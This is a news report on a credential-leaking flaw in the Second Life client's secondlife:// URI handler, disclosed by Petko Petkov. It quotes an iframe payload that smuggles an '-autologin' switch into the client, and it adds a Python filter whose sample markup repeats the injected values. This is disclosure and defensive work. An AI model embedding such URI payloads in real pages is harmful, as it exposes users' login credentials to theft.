Security hole in Second Life client
Security blogger Petko Petkov has reported a vulnerability in the Second Life online gaming client. Attackers can apparently exploit it to obtain user login credentials for the gaming site. When installed, the client registers the URI secondlife://. A URI of this type can then be used to pass additional parameters to the client when it is launched. By embedding the following line in a website, attackers can get the client to send login credentials in an XML form without the user being prompted:
<iframe src='secondlife://" -autologin
An XML document transmitted by the Second Life client contains a login name and user password, both of which are sent as an MD5 hash. The credentials can be recovered by an attacker, for example by using rainbow tables, which are readily available online. But Petkov points out that this process is usually unnecessary: the hash alone generally suffices to log in to Second Life. He says that the password is only needed to use other Second Life services. Victims need only visit a specially crafted website or open an HTML e-mail for the attack to succeed. There is no solution for this vulnerability; un-registering the URI should help, though, as a workaround, and gamers should of course ensure their Second Life login is completely different from their computer account credentials.
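One way a mail or web filter could flag the pattern described above, as an added example that is not from the article or from Petkov's advisory: it scans HTML for secondlife: URIs whose value contains a double quote or an appended dash-prefixed switch. The function names, the attribute list and the sample markup (including the region-style link) are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

SCHEME = "secondlife:"  # URI scheme named in the article
URL_ATTRS = {"src", "href", "data", "action", "background"}  # assumed attribute list

# Constructed sample: one ordinary region link and two suspicious values.
SAMPLE = """
<p><a href="secondlife://Ahern/128/128/30">Meet me here</a></p>
<iframe src='secondlife://" -autologin'></iframe>
<img src="secondlife:%22%20-autologin">
"""

def is_suspicious(uri: str) -> bool:
    """True if a secondlife: URI looks like it carries extra client arguments."""
    value = unquote(uri.strip())  # check percent-encoded quotes and spaces too
    if not value.lower().startswith(SCHEME):
        return False
    rest = value[len(SCHEME):]
    # A double quote can end the quoted argument handed to the client;
    # whitespace followed by '-' looks like an appended command-line switch.
    if '"' in rest:
        return True
    return any(token.startswith("-") for token in rest.split()[1:])

class HandlerUriScanner(HTMLParser):
    """Collects (tag, attribute, value) for every suspicious URL attribute."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value and is_suspicious(value):
                self.findings.append((tag, name, value))

def scan_html(markup: str):
    """Return the suspicious secondlife: references found in an HTML document."""
    scanner = HandlerUriScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```
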
It remains to be seen what real use criminals can make of this login data. Probably the most lucrative option would be to clean out a victim's virtual Linden dollar account. Currently, 1,000 Linden dollars are worth 3.5 real-world US dollars. On the other hand, it will probably be difficult to withdraw large amounts because there is a cap on exchanges depending on how long a user has been playing. At any rate, few players are said to have more than 250,000 Linden dollars, which only amounts to around UK£430.
- IE pwns SecondLife, security advisory at pdp